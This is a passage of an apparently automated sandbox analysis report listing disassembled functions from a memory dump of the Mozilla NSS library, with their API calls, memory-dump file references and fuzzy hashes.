                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D05204A), ref: 6D0C07E4
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,6D05204A), ref: 6D0C0864
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D0C0880
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,6D05204A), ref: 6D0C08CB
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08D7
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08FB
                                                              • TlsGetValue.KERNEL32 ref: 6D0E9CE8
                                                              • EnterCriticalSection.KERNEL32(?,?,6D0EECEC,6D0F2FCD,00000000,?,6D0F2FCD,?), ref: 6D0E9D01
                                                              • TlsGetValue.KERNEL32(?,?,?,6D0EECEC,6D0F2FCD,00000000,?,6D0F2FCD,?), ref: 6D0E9D38
                                                              • EnterCriticalSection.KERNEL32(?,?,6D0EECEC,6D0F2FCD,00000000,?,6D0F2FCD,?), ref: 6D0E9D4D
                                                              • PR_Unlock.NSS3 ref: 6D0E9D70
                                                              • PR_Unlock.NSS3 ref: 6D0E9DC3
                                                              • PR_NewLock.NSS3 ref: 6D0E9DDD
                                                                • Part of subcall function 6D0E88D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6D0F0725,00000000,00000058), ref: 6D0E8906
                                                                • Part of subcall function 6D0E88D0: EnterCriticalSection.KERNEL32(?), ref: 6D0E891A
                                                                • Part of subcall function 6D0E88D0: PL_ArenaAllocate.NSS3(?,?), ref: 6D0E894A
                                                                • Part of subcall function 6D0E88D0: calloc.MOZGLUE(00000001,6D0F072D,00000000,00000000,00000000,?,6D0F0725,00000000,00000058), ref: 6D0E8959
                                                                • Part of subcall function 6D0E88D0: memset.VCRUNTIME140(?,00000000,?), ref: 6D0E8993
                                                                • Part of subcall function 6D0E88D0: PR_Unlock.NSS3(?), ref: 6D0E89AF
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                              • String ID:
                                                              • API String ID: 3394263606-0
                                                              • Opcode ID: 51923372f8dca760fe99a28bf1ef0cf4e04c524942ab612be4331cc0c05c7731
                                                              • Instruction ID: 146ed361452c4f5721ff6f198b8e5f7913c3377a1a831eb3d4c6c1fc022f818c
                                                              • Opcode Fuzzy Hash: 51923372f8dca760fe99a28bf1ef0cf4e04c524942ab612be4331cc0c05c7731
                                                              • Instruction Fuzzy Hash: CD5142B4A087168FEB01EF68D58476EBBF4BF44394F068529D998DB314E770E880CB91
                                                              Function 6D0D3C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsGetValue.KERNEL32(?,?,?,?,6D14460B,?,?), ref: 6D0D3CA9
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0D3CB9
                                                              • PL_HashTableLookup.NSS3(?), ref: 6D0D3CC9
                                                              • SECITEM_DupItem_Util.NSS3(00000000), ref: 6D0D3CD6
                                                              • PR_Unlock.NSS3 ref: 6D0D3CE6
                                                              • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6D0D3CF6
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D0D3D03
                                                              • PR_Unlock.NSS3 ref: 6D0D3D15
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                              • String ID:
                                                              • API String ID: 1376842649-0
                                                              • Opcode ID: 2ac600d4a716378752f2cef58b33deee8f783476448e320b0c67c30ad1068966
                                                              • Instruction ID: 3ca990d3e9a1263f63087e5199bc71cc096f3e34c6987df8dcc875eeb6e26303
                                                              • Opcode Fuzzy Hash: 2ac600d4a716378752f2cef58b33deee8f783476448e320b0c67c30ad1068966
                                                              • Instruction Fuzzy Hash: 7211E3B6D04705A7EB215624FC09B6B3B78AF5625CF0A4131FE1893211FB22D864CAD1
                                                              Function 6D0D9C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6D0F11C0: PR_NewLock.NSS3 ref: 6D0F1216
                                                              • free.MOZGLUE(?), ref: 6D0D9E17
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0D9E25
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0D9E4E
                                                              • TlsGetValue.KERNEL32 ref: 6D0D9EA2
                                                                • Part of subcall function 6D0E9500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6D0E9546
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0D9EB6
                                                              • PR_Unlock.NSS3 ref: 6D0D9ED9
                                                              • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6D0D9F18
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                              • String ID:
                                                              • API String ID: 3381623595-0
                                                              • Opcode ID: 53dac3a3d9a5121ed51d834994c8d146c045801d3926c7caf3e641ba31200730
                                                              • Instruction ID: 59fb3af4dda98493927fc29a7cb55af26c298cfcda9cfeb0b91468cf28754452
                                                              • Opcode Fuzzy Hash: 53dac3a3d9a5121ed51d834994c8d146c045801d3926c7caf3e641ba31200730
                                                              • Instruction Fuzzy Hash: 5C81D2B5A04702AFFB519F24EC40B7BB7E9BF44288F05452AED4987251FB31E910C7A2
                                                              Function 6D0EDCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6D0EAB10: DeleteCriticalSection.KERNEL32(D958E852,6D0F1397,5B5F5EC0,?,?,6D0EB1EE,2404110F,?,?), ref: 6D0EAB3C
                                                                • Part of subcall function 6D0EAB10: free.MOZGLUE(D958E836,?,6D0EB1EE,2404110F,?,?), ref: 6D0EAB49
                                                                • Part of subcall function 6D0EAB10: DeleteCriticalSection.KERNEL32(5D5E6D2E), ref: 6D0EAB5C
                                                                • Part of subcall function 6D0EAB10: free.MOZGLUE(5D5E6D22), ref: 6D0EAB63
                                                                • Part of subcall function 6D0EAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6D0EAB6F
                                                                • Part of subcall function 6D0EAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6D0EAB76
                                                              • TlsGetValue.KERNEL32 ref: 6D0EDCFA
                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 6D0EDD0E
                                                              • PK11_IsFriendly.NSS3(?), ref: 6D0EDD73
                                                              • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6D0EDD8B
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0EDE81
                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6D0EDEA6
                                                              • PR_Unlock.NSS3(?), ref: 6D0EDF08
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                              • String ID:
                                                              • API String ID: 519503562-0
                                                              • Opcode ID: 41c5c4cd103b13773877f3276a47843f7b60048c052c3d3c29e9f6d6bb5aa903
                                                              • Instruction ID: 7a0bae3d5616145d4212fd9f9f9ccc83a80d5a056fc7b1194531ecdff6a73a3b
                                                              • Opcode Fuzzy Hash: 41c5c4cd103b13773877f3276a47843f7b60048c052c3d3c29e9f6d6bb5aa903
                                                              • Instruction Fuzzy Hash: 2191BFB5E042069FEB00DF68C884B7AB7F5EFC4388F158028D9199B346E731E951CBA1
                                                              Function 6D0C2D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: __allrem
                                                              • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                              • API String ID: 2933888876-3221253098
                                                              • Opcode ID: f00f9a337124f8f8c6c62cd66fdc330a0a9fd2f76a0dcbe4efdfefac26263061
                                                              • Instruction ID: aa314c18e72ebd94df48e8dc6bed9be22e9cf9ead535f416fdd7437f5cb0bd98
                                                              • Opcode Fuzzy Hash: f00f9a337124f8f8c6c62cd66fdc330a0a9fd2f76a0dcbe4efdfefac26263061
                                                              • Instruction Fuzzy Hash: D1616E75A002099FEB14CF78DC94B6E77F1FB49354F109128E916AB790EB31AD06CB92
                                                              Function 6D11AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6D11AB3E,?,?,?), ref: 6D11AC35
                                                                • Part of subcall function 6D0FCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6D0FCF16
                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6D11AB3E,?,?,?), ref: 6D11AC55
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6D11AB3E,?,?), ref: 6D11AC70
                                                                • Part of subcall function 6D0FE300: TlsGetValue.KERNEL32 ref: 6D0FE33C
                                                                • Part of subcall function 6D0FE300: EnterCriticalSection.KERNEL32(?), ref: 6D0FE350
                                                                • Part of subcall function 6D0FE300: PR_Unlock.NSS3(?), ref: 6D0FE5BC
                                                                • Part of subcall function 6D0FE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6D0FE5CA
                                                                • Part of subcall function 6D0FE300: TlsGetValue.KERNEL32 ref: 6D0FE5F2
                                                                • Part of subcall function 6D0FE300: EnterCriticalSection.KERNEL32(?), ref: 6D0FE606
                                                                • Part of subcall function 6D0FE300: PORT_Alloc_Util.NSS3(?), ref: 6D0FE613
                                                              • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6D11AC92
                                                              • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6D11AB3E), ref: 6D11ACD7
                                                              • PORT_Alloc_Util.NSS3(?), ref: 6D11AD10
                                                              • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6D11AD2B
                                                                • Part of subcall function 6D0FF360: TlsGetValue.KERNEL32(00000000,?,6D11A904,?), ref: 6D0FF38B
                                                                • Part of subcall function 6D0FF360: EnterCriticalSection.KERNEL32(?,?,?,6D11A904,?), ref: 6D0FF3A0
                                                                • Part of subcall function 6D0FF360: PR_Unlock.NSS3(?,?,?,?,6D11A904,?), ref: 6D0FF3D3
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                              • String ID:
                                                              • API String ID: 2926855110-0
                                                              • Opcode ID: 1a95bc48d75458531f95ead349438b6b6daf959e51f18512997f29bf48cfe688
                                                              • Instruction ID: 33622c234b9c8c54a6e2acc8356644b002d2621be5b81533df2ba01f1646e238
                                                              • Opcode Fuzzy Hash: 1a95bc48d75458531f95ead349438b6b6daf959e51f18512997f29bf48cfe688
                                                              • Instruction Fuzzy Hash: E9312BB1E086065FEB00CF659C40EBF7B76AF84328B158038E9149B344EB719D16C7E1
                                                              Function 6D0F8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_Now.NSS3 ref: 6D0F8C7C
                                                                • Part of subcall function 6D199DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D1E0A27), ref: 6D199DC6
                                                                • Part of subcall function 6D199DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D1E0A27), ref: 6D199DD1
                                                                • Part of subcall function 6D199DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D199DED
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0F8CB0
                                                              • TlsGetValue.KERNEL32 ref: 6D0F8CD1
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0F8CE5
                                                              • PR_Unlock.NSS3(?), ref: 6D0F8D2E
                                                              • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6D0F8D62
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0F8D93
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                              • String ID:
                                                              • API String ID: 3131193014-0
                                                              • Opcode ID: 6447f290a761aff3119262d291e6d64b7642c929cad7d17de111e3a21725653d
                                                              • Instruction ID: 2d38e67ea27d0b64c1467f745d00683d44204d2198324791f243fa34f0b784c2
                                                              • Opcode Fuzzy Hash: 6447f290a761aff3119262d291e6d64b7642c929cad7d17de111e3a21725653d
                                                              • Instruction Fuzzy Hash: 033120B1E04306ABEB109F6ADC447EAB7B4BF45314F240239EE1967390D770A966CBC1
                                                              Function 6D139D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6D139C5B), ref: 6D139D82
                                                                • Part of subcall function 6D1314C0: TlsGetValue.KERNEL32 ref: 6D1314E0
                                                                • Part of subcall function 6D1314C0: EnterCriticalSection.KERNEL32 ref: 6D1314F5
                                                                • Part of subcall function 6D1314C0: PR_Unlock.NSS3 ref: 6D13150D
                                                              • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6D139C5B), ref: 6D139DA9
                                                                • Part of subcall function 6D131340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6D0D895A,00000000,?,00000000,?,00000000,?,00000000,?,6D0CF599,?,00000000), ref: 6D13136A
                                                                • Part of subcall function 6D131340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6D0D895A,00000000,?,00000000,?,00000000,?,00000000,?,6D0CF599,?,00000000), ref: 6D13137E
                                                                • Part of subcall function 6D131340: PL_ArenaGrow.NSS3(?,6D0CF599,?,00000000,?,6D0D895A,00000000,?,00000000,?,00000000,?,00000000,?,6D0CF599,?), ref: 6D1313CF
                                                                • Part of subcall function 6D131340: PR_Unlock.NSS3(?,?,6D0D895A,00000000,?,00000000,?,00000000,?,00000000,?,6D0CF599,?,00000000), ref: 6D13145C
                                                              • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6D139C5B), ref: 6D139DCE
                                                                • Part of subcall function 6D131340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6D0D895A,00000000,?,00000000,?,00000000,?,00000000,?,6D0CF599,?,00000000), ref: 6D1313F0
                                                                • Part of subcall function 6D131340: PL_ArenaGrow.NSS3(?,6D0CF599,?,?,?,00000000,00000000,?,6D0D895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6D131445
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,6D139C5B), ref: 6D139DDC
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6D139C5B), ref: 6D139DFE
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6D139C5B), ref: 6D139E43
                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6D139C5B), ref: 6D139E91
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                                • Part of subcall function 6D131560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6D12FAAB,00000000), ref: 6D13157E
                                                                • Part of subcall function 6D131560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6D12FAAB,00000000), ref: 6D131592
                                                                • Part of subcall function 6D131560: memset.VCRUNTIME140(?,00000000,?), ref: 6D131600
                                                                • Part of subcall function 6D131560: PL_ArenaRelease.NSS3(?,?), ref: 6D131620
                                                                • Part of subcall function 6D131560: PR_Unlock.NSS3(?), ref: 6D131639
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                              • String ID:
                                                              • API String ID: 3425318038-0
                                                              • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                              • Instruction ID: eed3927415e2f1d8cd9d737e788b1c12a0ce537555c54ba762abba51a7334a08
                                                              • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                              • Instruction Fuzzy Hash: 2841B2B4600613AFF700CF14D950BA2BBA1FF55358F068128D9184BAA4EBB2E934CF80
                                                              Function 6D0FDDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6D0FDDEC
                                                                • Part of subcall function 6D130840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D1308B4
                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6D0FDE70
                                                              • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6D0FDE83
                                                              • HASH_ResultLenByOidTag.NSS3(?), ref: 6D0FDE95
                                                              • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6D0FDEAE
                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D0FDEBB
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0FDECC
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                              • String ID:
                                                              • API String ID: 1091488953-0
                                                              • Opcode ID: 267e2e7c808912a2aa1d157c0fbe3eccad21a4ef09aa5129138248ef322274cc
                                                              • Instruction ID: edf604686a69d30b826cc4739b2c05cd4c386cfcb925b7f406314d2a28b86e7c
                                                              • Opcode Fuzzy Hash: 267e2e7c808912a2aa1d157c0fbe3eccad21a4ef09aa5129138248ef322274cc
                                                              • Instruction Fuzzy Hash: 2C31F5B2D042156BFB00AF68AC41B7F76A8EF94608F160035EE09A7241F735D915C6F2
                                                              Function 6D12DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6D12D9E4,00000000), ref: 6D12DC30
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6D12D9E4,00000000), ref: 6D12DC4E
                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6D12D9E4,00000000), ref: 6D12DC5A
                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D12DC7E
                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6D12DCAD
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_Util$Arenamemcpy
                                                              • String ID:
